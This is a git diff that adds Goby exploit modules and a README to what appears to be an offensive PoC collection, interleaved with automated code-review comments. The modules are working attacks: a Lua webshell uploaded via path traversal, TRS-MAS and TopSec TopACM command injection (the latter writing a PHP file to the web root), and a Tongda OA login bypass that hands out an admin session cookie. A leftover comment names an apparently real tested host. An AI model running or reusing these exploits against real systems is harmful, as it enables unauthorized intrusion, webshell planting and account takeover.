     87 + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
     88 + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
     89 + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
     90 + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
     91 + cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
     92 + cfg.Data += "hello,world\r\n"
     93 + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
     94 + if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 {
     95 + return strings.Contains(resp.Utf8Html, "\"status\":true") &&
     96 + strings.Contains(resp.Utf8Html, "upload file success")
     97 + }
     98 + return false
     99 + },
     100 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
     101 + randomFilename := goutils.RandomHexString(4)
     102 + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename))
     103 + //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC")
     104 + cfg.VerifyTls = false
     105 + cfg.FollowRedirect = false
     106 + cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo)
     107 + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
     108 + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
     109 + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
     110 + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
     111 + cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
     112 + cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n"
     113 + cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n"
     114 + cfg.Data += "local t = io.popen(cmd)\r\n"
     115 + cfg.Data += "local a = t:read(\"*all\")\r\n"
     116 + cfg.Data += "ngx.say(a)\r\n"
     117 + cfg.Data += "end\r\n"
     118 + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
     119 + httpclient.DoHttpRequest(expResult.HostInfo, cfg)
     120 + cmd := ss.Params["cmd"].(string)
     121 + if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 {
     122 + expResult.Success = true
     123 + expResult.Output = resp.Utf8Html
     124 + }
     125 + return expResult
     126 + },
     127 + ))
     128 +}
     129 + 
    lib/goby/goby_pocs/README.md
     1 +# goby-poc
     2 +# 声明
     3 +包含447个自定义goby-poc,是否含有后门和重复自行判断,如果无红队版,可直接poc管理处导入自定义poc即可,共计745个。
     4 +![图片](https://user-images.githubusercontent.com/74171727/185719401-f4782b47-157b-48db-87df-955a65adc487.png)
     5 + 
     6 + 
     7 +本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。
     8 + 
     9 +Goby POC 仅仅只供对已授权的目标使用测试,对未授权目标的测试,本库不承担责任,均由使用者自行承担。
     10 + 
     11 + 
     12 +## ✦✦Star上升曲线✦✦
     13 + 
     14 +[![Stargazers over time](https://starchart.cc/MY0723/goby-poc.svg)](https://starchart.cc/MY0723/goby-poc)
     15 + 
     16 + 
    lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "git.gobies.org/goby/goscanner/goutils"
     5 +)
     6 + 
     7 +func init() {
     8 + expJson := `{
     9 + "Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
     10 + "Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation.&nbsp;</p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
     11 + "Product": "TRS-MAS",
     12 + "Homepage": "http://www.trs.com.cn/",
     13 + "DisclosureDate": "2022-04-28",
     14 + "Author": "liubye",
     15 + "FofaQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"",
     16 + "GobyQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"",
     17 + "Level": "3",
     18 + "Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
     19 + "Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable&nbsp;/sysinfo/testCommandExecutor.jsp&nbsp;path access.<br></p>",
     20 + "References": [
     21 + "https://cn-sec.com/archives/966820.html"
     22 + ],
     23 + "Is0day": false,
     24 + "HasExp": true,
     25 + "ExpParams": [
     26 + {
     27 + "name": "cmdLine",
     28 + "type": "input",
     29 + "value": "whoami",
     30 + "show": ""
     31 + }
     32 + ],
     33 + "ExpTips": {
     34 + "Type": "",
     35 + "Content": ""
     36 + },
     37 + "ScanSteps": [
     38 + "AND",
     39 + {
     40 + "Request": {
     41 + "method": "GET",
     42 + "uri": "/mas/sysinfo/testCommandExecutor.jsp",
     43 + "follow_redirect": true,
     44 + "header": {},
     45 + "data_type": "text",
     46 + "data": ""
     47 + },
     48 + "ResponseTest": {
     49 + "type": "group",
     50 + "operation": "AND",
     51 + "checks": [
     52 + {
     53 + "type": "item",
     54 + "variable": "$code",
     55 + "operation": "==",
     56 + "value": "200",
     57 + "bz": ""
     58 + },
     59 + {
     60 + "type": "item",
     61 + "variable": "$body",
     62 + "operation": "contains",
     63 + "value": "测试命令行进程执行",
     64 + "bz": ""
     65 + }
     66 + ]
     67 + },
     68 + "SetVariable": []
     69 + }
     70 + ],
     71 + "ExploitSteps": [
     72 + "AND",
     73 + {
     74 + "Request": {
     75 + "method": "GET",
     76 + "uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=",
     77 + "follow_redirect": true,
     78 + "header": {},
     79 + "data_type": "text",
     80 + "data": ""
     81 + },
     82 + "ResponseTest": {
     83 + "type": "group",
     84 + "operation": "AND",
     85 + "checks": [
     86 + {
     87 + "type": "item",
     88 + "variable": "$code",
     89 + "operation": "==",
     90 + "value": "200",
     91 + "bz": ""
     92 + },
     93 + {
     94 + "type": "item",
     95 + "variable": "$body",
     96 + "operation": "contains",
     97 + "value": "测试命令行进程执行",
     98 + "bz": ""
     99 + }
     100 + ]
     101 + },
     102 + "SetVariable": []
     103 + }
     104 + ],
     105 + "Tags": [
     106 + "Command Execution"
     107 + ],
     108 + "VulType": [
     109 + "Command Execution"
     110 + ],
     111 + "CVEIDs": [
     112 + ""
     113 + ],
     114 + "CNNVD": [
     115 + ""
     116 + ],
     117 + "CNVD": [
     118 + ""
     119 + ],
     120 + "CVSSScore": "9.7",
     121 + "Translation": {
     122 + "CN": {
     123 + "Name": "TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行",
     124 + "Product": "拓尔思-MAS",
     125 + "Description": "<p><span style=\"color: rgb(45, 46, 47); font-size: medium;\">TRS MAS是基于移动互联网时代音视频的使用特点,</span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">北京拓尔思信息技术股份有限公司</span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">推出的一套通用型媒资管理系统,同一个音视频资源能面向不同的终端平台提供使用,有效节省成本,简化操作。</span></p><p><span style=\"color: rgb(45, 46, 47); font-size: medium;\">TRS MAS&nbsp;</span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>",
     126 + "Recommendation": "<p><span style=\"color: rgb(0, 0, 0); font-size: 18px;\">目前受漏洞影响的版本官方已停止更新,建议使用防御设备进行防护,禁止对&nbsp;<span style=\"color: rgb(0, 0, 0); font-size: 18px;\">/sysinfo/testCommandExecutor.jsp 路径的访问。</span></span><br></p>",
     127 + "Impact": "<p><span style=\"font-size: medium; color: rgb(45, 46, 47);\">TRS MAS&nbsp;</span><span style=\"font-size: medium; color: rgb(45, 46, 47);\">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>",
     128 + "VulType": [
     129 + "命令执⾏"
     130 + ],
     131 + "Tags": [
     132 + "命令执⾏"
     133 + ]
     134 + },
     135 + "EN": {
     136 + "Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
     137 + "Product": "TRS-MAS",
     138 + "Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation.&nbsp;</p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
     139 + "Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable&nbsp;/sysinfo/testCommandExecutor.jsp&nbsp;path access.<br></p>",
     140 + "Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
     141 + "VulType": [
     142 + "Command Execution"
     143 + ],
     144 + "Tags": [
     145 + "Command Execution"
     146 + ]
     147 + }
     148 + },
     149 + "AttackSurfaces": {
     150 + "Application": null,
     151 + "Support": null,
     152 + "Service": null,
     153 + "System": null,
     154 + "Hardware": null
     155 + }
     156 +}`
     157 + 
     158 + ExpManager.AddExploit(NewExploit(
     159 + goutils.GetFileName(),
     160 + expJson,
     161 + nil,
     162 + nil,
     163 + ))
     164 +}
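Review bot: The identifier arrays `"CVEIDs": [""]`, `"CNNVD": [""]` and `"CNVD": [""]` each carry a single empty string where an empty array (`[]`) is meant, so anything iterating these lists sees one blank identifier; the Tongda OA and TopSec TopACM files in this commit have the same shape. The ExploitSteps ResponseTest repeats the ScanSteps check byte for byte (status 200 plus the same page-title string), so an exploit result from this record carries no more evidence than the scan result did. If that is intentional, saying so in the check's `"bz"` field, e.g. `"bz": "page render only; command output not verified"`, makes the limitation visible to whoever reads the result.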
    lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "git.gobies.org/goby/goscanner/goutils"
     5 + "git.gobies.org/goby/goscanner/jsonvul"
     6 + "git.gobies.org/goby/goscanner/scanconfig"
     7 + "git.gobies.org/goby/httpclient"
     8 + "regexp"
     9 + "strings"
     10 +)
     11 + 
     12 +func init() {
     13 + expJson := `{
     14 + "Name": "Tongda OA Arbitrary User Login Vulnerability",
     15 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
     16 + "Product": "Tongda-OA",
     17 + "Homepage": "https://www.tongda2000.com/",
     18 + "DisclosureDate": "2021-05-20",
     19 + "Author": "[email protected]",
     20 + "FofaQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
     21 + "GobyQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
     22 + "Level": "3",
     23 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
     24 + "Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time.&nbsp;</span>https://www.tongda2000.com/</a><br></p>",
     25 + "References": [
     26 + "https://fofa.so/"
     27 + ],
     28 + "Is0day": true,
     29 + "HasExp": true,
     30 + "ExpParams": [],
     31 + "ExpTips": {
     32 + "Type": "",
     33 + "Content": ""
     34 + },
     35 + "ScanSteps": [
     36 + "AND",
     37 + {
     38 + "Request": {
     39 + "method": "GET",
     40 + "uri": "/",
     41 + "follow_redirect": true,
     42 + "header": {},
     43 + "data_type": "text",
     44 + "data": ""
     45 + },
     46 + "ResponseTest": {
     47 + "type": "group",
     48 + "operation": "AND",
     49 + "checks": [
     50 + {
     51 + "type": "item",
     52 + "variable": "$code",
     53 + "operation": "==",
     54 + "value": "200",
     55 + "bz": ""
     56 + }
     57 + ]
     58 + },
     59 + "SetVariable": []
     60 + }
     61 + ],
     62 + "ExploitSteps": [
     63 + "AND",
     64 + {
     65 + "Request": {
     66 + "method": "GET",
     67 + "uri": "",
     68 + "follow_redirect": true,
     69 + "header": {},
     70 + "data_type": "text",
     71 + "data": ""
     72 + },
     73 + "ResponseTest": {
     74 + "type": "group",
     75 + "operation": "AND",
     76 + "checks": [
     77 + {
     78 + "type": "item",
     79 + "variable": "$code",
     80 + "operation": "==",
     81 + "value": "200",
     82 + "bz": ""
     83 + }
     84 + ]
     85 + },
     86 + "SetVariable": []
     87 + }
     88 + ],
     89 + "Tags": [
     90 + "Login Bypass"
     91 + ],
     92 + "VulType": [
     93 + "Login Bypass"
     94 + ],
     95 + "CVEIDs": [
     96 + ""
     97 + ],
     98 + "CNNVD": [
     99 + ""
     100 + ],
     101 + "CNVD": [
     102 + ""
     103 + ],
     104 + "CVSSScore": "9.0",
     105 + "Translation": {
     106 + "CN": {
     107 + "Name": "通达 OA 任意用户登陆漏洞",
     108 + "Product": "通达-OA",
     109 + "Description": "<p>通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。<br></p><p>通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</p>",
     110 + "Recommendation": "<p>请联系官方厂商进行更新。<a href=\"https://www.tongda2000.com/\" target=\"_blank\">https://www.tongda2000.com/</a><br></p>",
     111 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</span><br></p>",
     112 + "VulType": [
     113 + "登录绕过"
     114 + ],
     115 + "Tags": [
     116 + "登录绕过"
     117 + ]
     118 + },
     119 + "EN": {
     120 + "Name": "Tongda OA Arbitrary User Login Vulnerability",
     121 + "Product": "Tongda-OA",
     122 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
     123 + "Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time.&nbsp;</span>https://www.tongda2000.com/</a><br></p>",
     124 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>",
     125 + "VulType": [
     126 + "Login Bypass"
     127 + ],
     128 + "Tags": [
     129 + "Login Bypass"
     130 + ]
     131 + }
     132 + },
     133 + "AttackSurfaces": {
     134 + "Application": null,
     135 + "Support": null,
     136 + "Service": null,
     137 + "System": null,
     138 + "Hardware": null
     139 + }
     140 +}`
     141 + 
     142 + checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool {
     143 + requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php")
     144 + requestConfig.VerifyTls = false
     145 + requestConfig.FollowRedirect = false
     146 + 
     147 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     148 + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda")
     149 + }
     150 + return false
     151 + }
     152 + 
     153 + getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string {
     154 + requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php")
     155 + requestConfig.VerifyTls = false
     156 + requestConfig.FollowRedirect = false
     157 + 
     158 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     159 + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"codeuid\"") {
     160 + return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1]
     161 + }
     162 + }
     163 + return ""
     164 + }
     165 + 
     166 + getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string {
     167 + requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php")
     168 + requestConfig.VerifyTls = false
     169 + requestConfig.FollowRedirect = false
     170 + requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded")
     171 + requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}"
     172 + 
     173 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     174 + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"url\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") {
     175 + return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1]
     176 + }
     177 + }
     178 + return ""
     179 + }
     180 + 
     181 + exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool {
     182 + // 攻击 URL
     183 + requestConfig := httpclient.NewGetRequestConfig("/general/")
     184 + requestConfig.VerifyTls = false
     185 + requestConfig.FollowRedirect = false
     186 + requestConfig.Timeout = 15
     187 + requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid)
     188 + 
     189 + // 发送攻击请求
     190 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     191 + return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo")
     192 + }
     193 + return false
     194 + }
     195 + 
     196 + ExpManager.AddExploit(NewExploit(
     197 + goutils.GetFileName(),
     198 + expJson,
     199 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
     200 + if checkIsTongdaOA1231234(u) {
     201 + codeuid := getTongdaCodeUID435345(u)
     202 + if codeuid != "" {
     203 + phpsessionid := getTongdaPHPSESSID4564234(codeuid, u)
     204 + if phpsessionid != "" {
     205 + return exploitTongda45321(phpsessionid, u)
     206 + }
     207 + }
     208 + }
     209 + 
     210 + return false
     211 + },
     212 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
     213 + 
     214 + if checkIsTongdaOA1231234(expResult.HostInfo) {
     215 + codeuid := getTongdaCodeUID435345(expResult.HostInfo)
     216 + if codeuid != "" {
     217 + phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo)
     218 + if phpsessionid != "" {
     219 + if exploitTongda45321(phpsessionid, expResult.HostInfo) {
     220 + expResult.Success = true
     221 + expResult.Output = "登陆成功,使用如下 session 即可登陆:" + phpsessionid
     222 + }
     223 + }
     224 + }
     225 + }
     226 + 
     227 + return expResult
     228 + },
     229 + ))
     230 +}
     231 + 
     232 +// http://14.18.236.21:8000/
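Review bot: `regexp.MustCompile(...).FindStringSubmatch(...)[1]` in getTongdaCodeUID435345 and getTongdaPHPSESSID4564234 indexes the submatch slice without checking it, so a body that contains `"codeuid"` (or a header string that contains `Set-Cookie: PHPSESSID=`) in a shape the pattern does not match yields a nil slice and panics the scanner with an index out of range; write `if m := codeuidRe.FindStringSubmatch(resp.RawBody); len(m) > 1 { return m[1] }` and the equivalent for the cookie pattern. Both patterns are also compiled on every call inside the closures; hoisting them to package-level `var codeuidRe = regexp.MustCompile(...)` declarations is the usual form and removes the per-request compile. The `//` comment on the file's last line is a test host URL left behind and should be removed before this is merged.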
    lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "git.gobies.org/goby/goscanner/goutils"
     5 + "git.gobies.org/goby/goscanner/jsonvul"
     6 + "git.gobies.org/goby/goscanner/scanconfig"
     7 + "git.gobies.org/goby/httpclient"
     8 + "net/url"
     9 + "strings"
     10 +)
     11 + 
     12 +func init() {
     13 + expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc.&nbsp;The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc.&nbsp;At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. 
Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"[email protected]","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" 
target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"<p>天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。<br></p><p>天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。<br></p>","Recommendation":"<p>目前厂商还未发布安全补丁,请关注官方更新。<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。</span><br></p>","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command 
Execution","Product":"TopSec-TopACM","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc.&nbsp;The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc.&nbsp;At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. 
Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}`
     14 + 
     15 + exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool {
     16 + // 攻击 URL
     17 + requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd))
     18 + requestConfig.VerifyTls = false
     19 + requestConfig.FollowRedirect = false
     20 + requestConfig.Timeout = 15
     21 + 
     22 + // 发送攻击请求
     23 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     24 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") {
     25 + return true
     26 + }
     27 + }
     28 + return false
     29 + }
     30 + 
     31 + checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
     32 + // 攻击 URL
     33 + requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php")
     34 + requestConfig.VerifyTls = false
     35 + requestConfig.FollowRedirect = false
